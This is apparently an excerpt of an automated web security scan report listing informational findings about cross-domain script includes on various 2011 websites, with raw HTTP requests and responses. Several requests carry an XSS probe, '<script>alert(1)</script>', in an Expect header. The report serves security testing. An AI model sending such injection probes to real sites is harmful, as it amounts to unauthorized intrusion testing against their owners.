<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
24.25. http://www.greenhulk.net/forums/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
24.26. http://www.herematures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herematures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8844
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:02:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Matures Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...
24.27. http://www.heresquirt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8750
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:48:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Pictures</title>
<!--
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...
24.28. http://www.herestuds.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herestuds.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8762
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:13:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Studs Movies</title>
<!-- SR
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...
24.29. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
</script>

<script type="text/javascript" src="http://tracker.mattel.com/?hotwheelscollector"></script>
...[SNIP]...
24.30. http://www.japanator.com/elephant/login.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<!-- End Quantcast tag -->


<SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=218&g=002&c=153225"></SCRIPT>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js" ></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://dt9.destructoid.com/elephant/js/mrskinner.js" ></script>
...[SNIP]...
</iframe>
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<BR>


<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28japanator">
</script>
...[SNIP]...
24.31. http://www.japanator.com/elephant/signup.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<!-- End Quantcast tag -->


<SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=218&g=002&c=153225"></SCRIPT>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js" ></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://dt9.destructoid.com/elephant/js/mrskinner.js" ></script>
...[SNIP]...
</iframe>
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<BR>


<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28japanator">
</script>
...[SNIP]...
24.32. http://www.kxii.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kxii.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kxii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: sj-c14-r7-u38-b5
Content-Type: text/html;charset=utf-8
Date: Sun, 01 May 2011 23:06:02 GMT
Content-Length: 31215
Connection: close
Set-Cookie: click_mobile=0

<script type="text/javascript">
<!--
window.location = "http://www.kxii.com/sitemap"
//-->
</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
24.33. http://www.lenox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:48:38 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=18008498;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Set-Cookie: CFTOKEN=3f48e32aae5ed302-ADF6BB1C-F0A7-563B-641D8D97D77EEE98;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<div id="verisign_box"><script type="text/javascript" src="https://sealserver.trustwave.com/seal.js?style=normal"></script>
...[SNIP]...
24.34. http://www.mylovedpee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedpee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8707
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:10:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Pee Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...
24.35. http://www.mylovedspy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedspy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8666
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:51:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Spy Pictures</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...
24.36. http://www.mytattoogallery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytattoogallery.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mytattoogallery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 60219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   www.my
...[SNIP]...
</script>
<script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"></script>
...[SNIP]...
24.37. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/ HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8kel0h54alrfeeq12er0b6lst4; path=/
Set-Cookie: phpjob_aff_id=0; expires=Mon, 01-Aug-2011 04:00:00 GMT
Set-Cookie: phpjob_lng=english; expires=Mon, 01-Aug-2011 04:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 45114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
24.38. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-1.4.4.min.js HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Referer: http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpjob_aff_id=0; phpjob_lng=english; PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:31:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 45154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
24.39. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/js/jquery-ui-1.8.7.custom.min.js HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
Referer: http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpjob_aff_id=0; phpjob_lng=english; PHPSESSID=cekfc38cl4o1p4aijb5c05v7u6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:31:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 45197

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
24.40. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript"></script>
...[SNIP]...
24.41. http://www.ronniesmailorder.com/fiche_select1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/flash_loader.js" language="javascript"></script>
<script src="http://www.powersportsnetwork.com/jquery_min.js" language="javascript"></script>
...[SNIP]...
24.42. http://www.seoq.com/ajaxAction.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /ajaxAction.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ajaxAction.php?url=onlinemicrofiche.com&sid=0.2201897264458239 HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:28:43 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:28:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
